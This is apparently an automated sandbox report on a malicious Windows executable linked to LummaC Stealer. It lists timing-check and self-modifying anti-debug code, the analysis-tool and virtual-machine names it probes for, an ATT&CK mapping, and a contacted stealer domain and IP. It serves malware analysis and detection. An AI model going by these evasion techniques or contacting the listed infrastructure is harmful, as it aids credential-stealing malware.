Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127142B second address: 127145A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E1h 0x00000009 popad 0x0000000a pushad 0x0000000b jg 00007F9668C559D6h 0x00000011 jo 00007F9668C559D6h 0x00000017 popad 0x00000018 pushad 0x00000019 jne 00007F9668C559D6h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12749EF second address: 12749F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12743E2 second address: 12743FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E1h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12743FD second address: 1274424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9668BCCCC6h 0x0000000a popad 0x0000000b jmp 00007F9668BCCCD4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F9668BCCCC6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274424 second address: 1274437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007F9668C559EAh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274437 second address: 127443B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274593 second address: 1274597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1274597 second address: 12745B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278079 second address: 1278081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1278081 second address: 127808B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9668BCCCC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127808B second address: 12780A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push ecx 0x00000009 jmp 00007F9668C559DFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D3EE second address: 127D3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127D3F2 second address: 127D408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F9668C559D8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F9668C559D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1285642 second address: 1285648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1285648 second address: 128564E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129035C second address: 1290362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128EF79 second address: 128EFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668C559E8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F9668C559D6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128F25B second address: 128F261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128F261 second address: 128F265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128F3FF second address: 128F405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290092 second address: 1290097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1290097 second address: 12900AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9668BCCCCCh 0x00000008 js 00007F9668BCCCC6h 0x0000000e pushad 0x0000000f jg 00007F9668BCCCC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129291A second address: 1292934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129485C second address: 1294878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD0h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1294878 second address: 129487C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129487C second address: 12948A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jng 00007F9668BCCCEDh 0x0000000f jmp 00007F9668BCCCD9h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12943BA second address: 12943C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129451D second address: 1294559 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9668BCCCCEh 0x00000008 ja 00007F9668BCCCC6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F9668BCCCC8h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F9668BCCCD8h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D4A1 second address: 129D4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129D4A5 second address: 129D4C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F1F1 second address: 129F1FB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9668C559E2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F1FB second address: 129F20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9668BCCCC6h 0x0000000a jbe 00007F9668BCCCCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F20D second address: 129F218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129F218 second address: 129F21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B060B second address: 12B0619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B0619 second address: 12B0623 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9668BCCCCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B41C8 second address: 12B41CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B41CC second address: 12B41D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC651 second address: 12CC666 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9668C559D6h 0x00000008 jc 00007F9668C559D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CC666 second address: 12CC6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9668BCCCD7h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F9668BCCCC6h 0x00000013 jmp 00007F9668BCCCD6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB724 second address: 12CB72C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CB87F second address: 12CB883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CBBB6 second address: 12CBBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDC2C second address: 12CDC31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0808 second address: 12D0817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0A3C second address: 12D0AA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668BCCCD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9668BCCCD9h 0x0000000f nop 0x00000010 or dword ptr [ebp+122D1DF3h], edx 0x00000016 push dword ptr [ebp+122D1812h] 0x0000001c movsx edx, dx 0x0000001f call 00007F9668BCCCC9h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 jmp 00007F9668BCCCD6h 0x0000002c pop eax 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0AA4 second address: 12D0AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0AA9 second address: 12D0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9668BCCCC6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F9668BCCCCFh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jno 00007F9668BCCCC6h 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0AD4 second address: 12D0AF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0AF7 second address: 12D0AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0AFB second address: 12D0B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1E73 second address: 12D1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D1E79 second address: 12D1E9C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F9668C559D6h 0x0000000d jmp 00007F9668C559E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3E3A second address: 12D3E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9668BCCCCAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EFD0A second address: 11EFD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 103CA46 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 103C947 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 103A1A6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11F4932 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12675C4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7044Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7044Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1576433185.0000000001B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
Source: file.exe, 00000000.00000002.1576433185.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576433185.0000000001B43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101DF70 LdrInitializeThunk,0_2_0101DF70
Source: file.exe, file.exe, 00000000.00000002.1575121229.00000000011C3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: >Program Manager
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping631
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
Obfuscated Files or Information		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS223
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe100%AviraTR/Crypt.TPM.Gen
file.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.m80%Avira URL Cloudsafe
https://property-imper.sbs/Q0%Avira URL Cloudsafe
https://property-imper.sbs/apiS0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
property-imper.sbs
172.67.162.84
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://property-imper.sbs/apifalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://property-imper.sbs/apiSfile.exe, 00000000.00000002.1576433185.0000000001ADE000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://property-imper.sbs/Qfile.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://property-imper.sbs/qfile.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmpfalse
        		unknown
        https://property-imper.sbs/file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://crl.m8file.exe, 00000000.00000002.1576433185.0000000001B8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1574657240.0000000001B8B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          172.67.162.84
          		property-imper.sbsUnited States
          		13335CLOUDFLARENETUSfalse

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1561818
          Start date and time:2024-11-24 11:32:13 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 55s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:2
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.evad.winEXE@1/0@1/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe

          Simulations

          Behavior and APIs

          TimeTypeDescription
          05:33:27API Interceptor2x Sleep call for process: file.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          172.67.162.84file.exeGet hashmaliciousLummaC StealerBrowse
            file.exeGet hashmaliciousLummaC StealerBrowse
              file.exeGet hashmaliciousLummaC StealerBrowse
                file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                  file.exeGet hashmaliciousLummaC StealerBrowse
                    file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                      file.exeGet hashmaliciousLummaC StealerBrowse
                        file.exeGet hashmaliciousLummaC StealerBrowse
                          2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            file.exeGet hashmaliciousLummaC StealerBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 104.21.33.116
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 104.21.33.116
                              file.exeGet hashmaliciousUnknownBrowse
                              • 104.21.33.116

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSzapret.exeGet hashmaliciousUnknownBrowse
                              • 104.26.13.205
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 172.64.41.3
                              IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                              • 172.67.75.40
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                              • 104.18.167.46
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                              • 104.18.166.46
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 172.67.162.84
                              santi.exeGet hashmaliciousFormBookBrowse
                              • 104.21.88.139

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 172.67.162.84
                              IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
                              file.exeGet hashmaliciousLummaC StealerBrowse
                              • 172.67.162.84
